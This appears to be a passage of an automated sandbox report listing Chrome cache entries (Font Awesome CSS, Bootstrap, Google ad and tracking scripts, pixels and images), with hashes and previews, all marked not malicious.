Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 315

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65321)
Category:	downloaded
Size (bytes):	96614
Entropy (8bit):	4.750153610655337
Encrypted:	false
SSDEEP:	1536:EKM1MvMaMfMRQA709/bQZMfjSFOlyPG9zXgRw0D:Z709/UGGFwyPG9zwRw0D
MD5:	4CA760F49CD8A14911C81E6C14328874
SHA1:	81687E7A5DBBA470120798CF05DC31E8D57F0B11
SHA-256:	F99C17690330C805C47DA3D7592864D6ACF0F73817D432447E1B0C66AD28F221
SHA-512:	BC14B089615EC40F6B031631CA36D75FC55267117BBD7D6DFBE21821DA288E56F2FBDCE920B9984D82D80067C153A8EC43CC664D40853298CF248C0F0F4A278C
Malicious:	false
Reputation:	unknown
URL:	https://ka-f.fontawesome.com/releases/v6.6.0/css/free.min.css?token=8ce76d2187
Preview:	/!. Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */.fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp-solid,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;

Chrome Cache Entry: 316

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	13
Entropy (8bit):	2.7773627950641693
Encrypted:	false
SSDEEP:	3:qVZPV:qzd
MD5:	C83301425B2AD1D496473A5FF3D9ECCA
SHA1:	941EFB7368E46B27B937D34B07FC4D41DA01B002
SHA-256:	B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
SHA-512:	83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
Malicious:	false
Reputation:	unknown
URL:	https://td.doubleclick.net/td/ga/rul?tid=G-JH2MNQ1WXY&gacid=1627253267.1730398763&gtm=45je4au0v9106823843za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101533422~101823848~101878899~101878944~101925629&z=1195082281
Preview:	<html></html>

Chrome Cache Entry: 317

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2016)
Category:	dropped
Size (bytes):	39635
Entropy (8bit):	5.519642162172215
Encrypted:	false
SSDEEP:	768:qzYb3uSHMeNfX5m6cx/qbk/Bssq+2ZSgxIs9bWHGJ4CricXgTpg/4G0yl6qQHm5L:RDlO/qY/B82c8OACsvEF
MD5:	CC42289087B3F73300F3C5E415B64EC5
SHA1:	6601C16428E3F155F0F2A43A8BF8773A0E2F9C60
SHA-256:	9713067914ACF51B1A42776C63F42801C2145580D8923848BDE24581C9157DC0
SHA-512:	A2FD8E9024A0DCB41FC31C7F2B1CCE7ED7E320EA585F39DF963758B904A6472600C0BE12B814AD879E202632329DB49B391B61B4466A1E49A1E6415387F5C520
Malicious:	false
Reputation:	unknown
Preview:	(function(){'use strict';/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=this\|\|self;function aa(a,b){a:{var c=["CLOSURE_FLAGS"];for(var d=m,e=0;e<c.length;e++)if(d=d[c[e]],d==null){c=null;break a}c=d}a=c&&c[a];return a!=null?a:b};const ba=(new Date("2024-01-01T00:00:00Z")).getTime(); .function ca(a){a=a.s;const b=encodeURIComponent;let c="";a.platform&&(c+="&uap="+b(a.platform));a.platformVersion&&(c+="&uapv="+b(a.platformVersion));a.uaFullVersion&&(c+="&uafv="+b(a.uaFullVersion));a.architecture&&(c+="&uaa="+b(a.architecture));a.model&&(c+="&uam="+b(a.model));a.bitness&&(c+="&uab="+b(a.bitness));a.fullVersionList&&(c+="&uafvl="+b(a.fullVersionList.map(d=>b(d.brand)+";"+b(d.version)).join("\|")));typeof a.wow64!=="undefined"&&(c+="&uaw="+Number(a.wow64));return c} .function da(a,b){return a.g?a.m.slice(0,a.g.index)+b+a.m.slice(a.g.index):a.m+b}function ea(a,b=0){let c="&act=1";b===0?c+="&ri=1":b===1?c+="&ri=24":b===2&&(c+="&ri=25");a.l&&a.s&

Chrome Cache Entry: 318

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 319

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	downloaded
Size (bytes):	15406
Entropy (8bit):	3.9650904047414803
Encrypted:	false
SSDEEP:	96:vqjLLciHMHlbQo4Sy9S6IXl2qsl+PlBaEK4NySkc:vqrsH+Xj9NYocT2Skc
MD5:	59382DD7DA8079DD45A8748ABDBBC76B
SHA1:	508364D967AAA97168C5E1801CC24D0DA9C24D1E
SHA-256:	DD8B5FBD942B954BF9AB87579DB1092B0AEBCBA2D5B31ABC68918A11341FF333
SHA-512:	C681FBD11D3D89B97C53D62D2A2399098808BF56DE32B4D5395B5002CF3287A6B2ED04E5FB94A18F60585678FE211480F893B420B95B7FDFEC3D234E67493325
Malicious:	false
Reputation:	unknown
URL:	https://trksyln.net/favicon.ico
Preview:	............ .h...6... .... .(.......00.... .h&......(....... ..... .........................fff....~................................................~fff....z...........................................................z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\|......

Chrome Cache Entry: 320

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 321

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65299)
Category:	downloaded
Size (bytes):	78743
Entropy (8bit):	5.178440533196338
Encrypted:	false
SSDEEP:	1536:tp+1ZTPR2t4tXbih05ve8/pwgrEpc9t0vSAIAxCs:MFRIpk0vSAV
MD5:	0AA8D64E726C4A57ADB5C88F9115996B
SHA1:	901169527507FF9E662CF64D8E361F359308970D
SHA-256:	7E1F1503DF765CCA5E099891B94E318A2EF95081BA2AF1EB6D417CC884BFDBFE
SHA-512:	EF6583F7684BB3B4F91405E7DEF90D65F9561BAA609540C3A66F3B4DE4267D283C2A7AF298BD86DF447B6ACE05993C2182EF47EDE4B30C25F79A38AD49E70A9F
Malicious:	false
Reputation:	unknown
URL:	https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js
Preview:	/!. Bootstrap v5.0.2 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t\|\|self).bootstrap=e()}(this,(function(){"use strict";const t={find:(t,e=document.documentElement)=>[].concat(...Element.prototype.querySelectorAll.call(e,t)),findOne:(t,e=document.documentElement)=>Element.prototype.querySelector.call(e,t),children:(t,e)=>[].concat(...t.children).filter(t=>t.matches(e)),parents(t,e){const i=[];let n=t.parentNode;for(;n&&n.nodeType===Node.ELEMENT_NODE&&3!==n.nodeType;)n.matches(e)&&i.push(n),n=n.parentNode;return i},prev(t,e){let i=t.previousElementSibling;for(;i;){if(i.matches(e))return[i];i=i.previousElementSibling}return[]},next(t,e){let i=

Chrome Cache Entry: 322

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_nid=pulsepoint_inc_&google_push=AXcoOmQHW3Senmpk8tpcaDaCAkasoYHxB1QL3vzrRn4MuUN_wlYAkuh8f5ngrgzRfD_4zBEpSvzZMxzLE6FJ02A6qXPBh-8n3s0ad4A9&google_hm=Y1VBN2hoMGE3N1Zr
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 323

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2015)
Category:	dropped
Size (bytes):	23719
Entropy (8bit):	5.515306985771955
Encrypted:	false
SSDEEP:	384:New8QJ1nMHy/58vrKEOAWXitfX/DfLSqyuBzjZRUVhwiRA5dob91tJ42hr7Vj2uX:New8QJ1nMS/Y4AYit/7fLbxzjchwiRAM
MD5:	43DBAFE0B9556A5D5EBAEE169037D65A
SHA1:	F9AD5C86F6A05BDB6C623C1B77FAFB035B7EEA16
SHA-256:	50F0D3269F54E343C4F8496EF3393D35F067D51C0E9E8319DF18317C86F5E0BC
SHA-512:	2327C663DA73961E1755EDA1221426D79122AD32499D0CA9EFAD096E24CAA4EC63AC3AF9B1DC0E3B0A30D1D4696AD78A262BE014594A75F2DCF7F66B6B6F1D08
Malicious:	false
Reputation:	unknown
Preview:	(function(){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this); .function ea(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}ea("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var n=this\|\|self;function fa(a,b,c){return a.call.apply(a.bind,arguments)}function p(a,b,c){p=fa;return p.apply(null,arguments)};function ha(a){n.setTimeout(()=>{t

Chrome Cache Entry: 324

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2015)
Category:	downloaded
Size (bytes):	23719
Entropy (8bit):	5.515306985771955
Encrypted:	false
SSDEEP:	384:New8QJ1nMHy/58vrKEOAWXitfX/DfLSqyuBzjZRUVhwiRA5dob91tJ42hr7Vj2uX:New8QJ1nMS/Y4AYit/7fLbxzjchwiRAM
MD5:	43DBAFE0B9556A5D5EBAEE169037D65A
SHA1:	F9AD5C86F6A05BDB6C623C1B77FAFB035B7EEA16
SHA-256:	50F0D3269F54E343C4F8496EF3393D35F067D51C0E9E8319DF18317C86F5E0BC
SHA-512:	2327C663DA73961E1755EDA1221426D79122AD32499D0CA9EFAD096E24CAA4EC63AC3AF9B1DC0E3B0A30D1D4696AD78A262BE014594A75F2DCF7F66B6B6F1D08
Malicious:	false
Reputation:	unknown
URL:	https://tpc.googlesyndication.com/pagead/js/r20241028/r20110914/elements/html/interstitial_ad_frame_fy2021.js
Preview:	(function(){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this); .function ea(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}ea("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var n=this\|\|self;function fa(a,b,c){return a.call.apply(a.bind,arguments)}function p(a,b,c){p=fa;return p.apply(null,arguments)};function ha(a){n.setTimeout(()=>{t

Chrome Cache Entry: 325

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 582 x 659, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	32541
Entropy (8bit):	7.8986843298880665
Encrypted:	false
SSDEEP:	768:HyAPP5SK4z6GuQJcr2wd8eRdklPypMF/xP:SCqhqkAMfP
MD5:	E5FDD25728A3E56C4C6E0A34C6D3299B
SHA1:	FEEDF942ACD4DF17892941430FECB7D7D2E9BD32
SHA-256:	02A3F526611C46135D089B1BC090986E8E0AB359CBBA247A6EBBFF026D114510
SHA-512:	C56D5E7AE76436492CE98A22EAC85DF9D507CA12162CC7D80D0AF864E2200DCEBE41AFEED22DCB3D0666433CBD8500B5333598BD3C0CD3B28B543EFB4D12C7A4
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...F.................sRGB.......~.IDATx....N.a..QX@..`Kj.5j.=....p!..6....qf=...d..z.$I.$I.$I.$I.$I....Z...@.....#.@....\|.#. %#..}`........g...A:>.;........0..`...`k.....@...a.#j.=....W?.A4..p.&.4L......n9..p..a..@2...QT..h3...9.?.,..y...Z..Y...pCiT..q......B4)ch.?."....o......:`....^.m\...4./H.QC.1..+...E~.e....6..........cz..x.7.:o.2o...i}=...0j@.F.z.~..>'n.Kx..t...@..f..#....$..a...2.AH..A..k.$".7..."Q....s..'sP..u.......E.._p........A.\|.<...g.[....`....8.......HgJ..x..<..lp..pd.S8a0.`6.E.p..#"".R..\|..gp...p.........-:..0.z....t.....x..x...`.[....I.....O[d.+..z....x-....fR..P(H6..\.'.LF........R.T$.LJ4..@ ..X,&.t...k......_..~....`...,...[#...9...0.U.KCDD...HF....Ei4...td8.J..^.'.rY......}.5BQ<..p8,.Ph.`...%..H.2..!..B.~ .....\..{..[#.5:....E`..]/......d".v[J..t.].N.........Z-#D.n".0B.....9........8......l.F.%sY6.-......].i..1:..B...&F...Wp.nE'l..."C..[.QF...IC.6.-.h.d........I.......m.I>..s.s..=......JRJ..+r.\|D..]..Qd

Chrome Cache Entry: 326

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	17030
Entropy (8bit):	6.017399633914369
Encrypted:	false
SSDEEP:	384:W8cqkuVleaFS4YUOQ430RpPd2IV7jSjbQ7u3Ow:W8cNuZeLQPLFV3uTOw
MD5:	DEA3CCD94090845CA5847A31242A381B
SHA1:	590DCF0DBE4B58BA6CE77A3405E4E1B18E8C5245
SHA-256:	6AD677FC1D78C1ED82A4B73DB5D1918BEAB3BD81BB2826E199DEBF0C039D7EB6
SHA-512:	63DA4FEC84576379EF0238B20E3F6644C908310C5D37FBBEBB0AE7C47A6599763BF3A48DAC90D883A610177AA0AA87CCB5EF525DD716DF92D0971B7437E2195C
Malicious:	false
Reputation:	unknown
URL:	https://ep1.adtrafficquality.google/getconfig/sodar?sv=200&tid=gda&tv=r20241028&st=env
Preview:	{"sodar_query_id":"O8ojZ-7CJv6TjuwPwabtmQQ","injector_basename":"sodar2","bg_hash_basename":"LKNVTCBmm8LONMAFh4vZaTIkTKvrw9NCcGbGJBxbjE8","bg_binary":"flR1OXTppYSO9cFV9KNYCoh+b0SaPEdvMS/Qbts3+yTlsRUQHMG4zY89Oh2k8sxDzmyJXObj0RP855b6PVjq8tDKohQ1S0EyjN0neJ5UZHxhwl6QkUX0+ETr29WmpxwzsQjKiUvhoBvQM1pfaK7dbqfs6cCa8yBWPOL6ivho8iUFAAXGPPxgXoahLcJ/i/tLytYTnjVn9+cXocjTgLvdppx145peG6CCM16c6vyvhLYK2JCiaGZz4hZcbAIFqzWUh0oOrlg9WPD9UlpZPnk7uKp0qpn86HiYGCcczOu9RZJ45A+OXBVZoIl6oulj9+5XAT0mS3vQu57NZrkyNbrVcD7HJauxbXJ/XOha691rG7Nh0yx7WjAonMUBLhvHeZojwNvwuZNjfClhmtxo+Zs4uz0rCFxYXmoJJpJCtqymLyxttCBirZVJDROc1r4kmjmccnBoG+1VTtAdUhVMMkA9ktILimNeQGgszEgX8oKSAJpkYSjQK1IEjpUEGRPnOfC0t5eakoyJ9yI+ooGJpy0JxaBhDASzDMK7a2khHeYNpObnjaHS34GhwtzAWenfN2efOP3wDPVlnBSUwC5KksP3m3eQevFvx5xWRujePye700/FtbCzs5HQr7Jr4s5mW/De0p8+qXemGt+p2uzfFLG1VQSP7owN+ECkRkU9OvtbRFLW4edc8KqxStvbkOmOY15N8xUxnQgOUM/g9SeXMw0VG0unzi99wCBqTCw/kKJeY32//5mlyrXJwbprlOrA+n7rAAl2sw7WS4UndHcXrQ6V8URtHnztSCVqQ94ju58NCkaa4ShroZdMQXjS+c1kiq0D0BTLp6G1AgEBUSEM7

Chrome Cache Entry: 327

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_nid=stackadapt_usd&google_hm=_yhf8n8vXnl46QBoNdb48K3--k0&google_push=AXcoOmRyI8F21-Wg9-ClV_GMcSKS-JEdK8e0hNkNpUxrM_9_KTEJg_mGuqLEG93DCe1MxNcb1YG8zgga00vYgS2qswEdwz2nZ6Ibdw
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 328

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_hm=YXRLd0JjZ2JBMU9lM25FcE44b2padw%3D%3D&google_nid=appier&google_push=AXcoOmShjhS5Zm_KHdaSXn-tCaCec1PeOGYmFvMPaZw78-IGK5FuaDdsBtdMrEqHY8thTWQB4xiS0bgu4ObwjjQPC6YJu2ETGeb0RCZc
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 329

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (16325)
Category:	downloaded
Size (bytes):	421812
Entropy (8bit):	5.63732372716147
Encrypted:	false
SSDEEP:	6144:O4RGTFh5GLgB40oQAzWRSR9cM8rT/r2+GUZ9Or24Avl:XRiFh6c40oQ6WGmYC
MD5:	A77368F741790ACA5E1C272150BC8D48
SHA1:	520A397DB79EBB0915C2E769B15110341588BAB8
SHA-256:	4FCC9FBCFB1F6E4B8FCBFECDC51FA069DC8767BD06D2AAA3182F34C76DA7036E
SHA-512:	6236D7662E3DA9BE5D12604FA7A17FC054DA215F0529327059F9050F3083F31DFB74858875B98F1FDBBB0CF4A4728EA8A228475F23335F18051130639231B925
Malicious:	false
Reputation:	unknown
URL:	https://www.googletagmanager.com/gtag/js?id=G-JH2MNQ1WXY
Preview:	.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":16,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",

Chrome Cache Entry: 330

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1560)
Category:	downloaded
Size (bytes):	1775
Entropy (8bit):	5.0855295906697
Encrypted:	false
SSDEEP:	48:dvPioG+d99D9ND9dKh2EZGS1eYzs9SHgm4:tP6u9RNRdKbgMGSM
MD5:	A5A0C9048EFB7CB5DF90023064D09BA4
SHA1:	9669B2608D986D4742DD2C0C114B148B6CDB5CDE
SHA-256:	DDFBE9EE1F7088339A85FA25A259765ADE4258C082A7921B9F569FF9616F904A
SHA-512:	97ED945E9CEFE0C070946F5D97E9D641FB7B1D9EC710DC3865D307E9F59E07D238084699D3C4E52E2F470A207AEE0E19C9C1939333DFEF041769976A0F5F1B48
Malicious:	false
Reputation:	unknown
URL:	https://ka-f.fontawesome.com/releases/v6.6.0/css/free-v4-font-face.min.css?token=8ce76d2187
Preview:	/!. Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-solid-900.woff2) format("woff2"),url(../webfonts/free-fa-solid-900.ttf) format("truetype")}@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-brands-400.woff2) format("woff2"),url(../webfonts/free-fa-brands-400.ttf) format("truetype")}@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-regular-400.woff2) format("woff2"),url(../webfonts/free-fa-regular-400.ttf) format("truetype");unicode-range:u+f003,u+f006,u+f014,u+f016-f017,u+f01a-f01b,u+f01d,u+f022,u+f03e,u+f044,u+f046,u+f05c-f05d,u+f06e,u+f070,u+f087-f088,u+f08a,u+f094,u+f096-f097,u+f09d,u+f0a0,u+f0a2,u+f0a4-f0a7,u+f0c5,u+f0c7,u+f0e5-f0e6,u+f0eb,u+f0f6-f0f8,u+f10c,u+f114-f

Chrome Cache Entry: 331

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_hm=MDVlN1hfNU5DZi1NS21pWE5zb2padw%3D%3D&google_nid=appier&google_push=AXcoOmR2IIZ4YsJVk04DJ3sEPljXl30nAB4FlfRKyEf975C_OU0tRWlILbg5ukscQ3zYNZHgvptm4LircZoI5foX6UAGpQqLXFsCIw
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 332

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 600 x 314, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	3360
Entropy (8bit):	7.6743461321785915
Encrypted:	false
SSDEEP:	96:4JFCnqNZnERobhNaSgjXxFF14fCOLfcNCV8J1D1:sCqbnS4Nkt1BAFVWf
MD5:	406843D17B7D22C28CCD59A5D4F2C8F2
SHA1:	664B0283F3C8FF53F568992C9C4168A687C6FF23
SHA-256:	9E4848C58442739631BAC6B708A30BD9A7F642C6BAAB8172D608B1403EACC482
SHA-512:	4A2671F00DF1913237FF728CF6147FFC2DE03FB1E1B7E20555B7F7A461775B48D919E47B44D5FE03EED5AF4BB5B6A7D85D02EDAF460F23F0452BF43B0AF0CF8F
Malicious:	false
Reputation:	unknown
URL:	https://tpc.googlesyndication.com/simgad/12987000312419448604/14763004658117789537
